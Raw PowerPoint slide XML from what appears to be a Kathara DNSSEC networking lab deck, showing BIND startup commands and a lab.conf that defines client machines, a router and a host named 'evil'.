                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E584613B-10BD-7F5A-C786-1C1FEA20FACA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{051A66E8-38C2-AA39-B668-4DD3E03E5713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE614721-DD2E-3243-CF2A-754683E3E024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0615AF3-D31D-C953-B22B-720103ED687B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5069119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7A61BD-7CC0-1239-A043-4AED4CA98720}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90797DB-31A2-25A9-F621-E42731E711C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AABA4C38-4199-CA74-DDD3-65198C4BA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A63D22B-26FE-483A-7334-2724147BCD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB849F58-F78E-CB4F-547E-5AE08BDCFE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13402060-D26D-6684-F4F5-52DE845EEF72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[0]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>firefox</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[port]="3001:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bridged</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>true</a:t>
              </a:r>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[1]="D"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[2]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="E"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE648D73-0971-C121-D306-CDC7D4C96846}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A867736-181A-908D-1205-CBE6203AE0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7066800" y="1617304"/>
            <a:ext cx="3470176" cy="463153"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -89152"/>
              <a:gd name="adj2" fmla="val 73210"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>graphic image for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69655516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D67697-3285-0042-03EA-61A5BD50CAA2}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A2D593-02A3-C771-32CB-B5E1BF8D15FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB97C6D3-6DEB-0889-414A-3F7C5460E155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
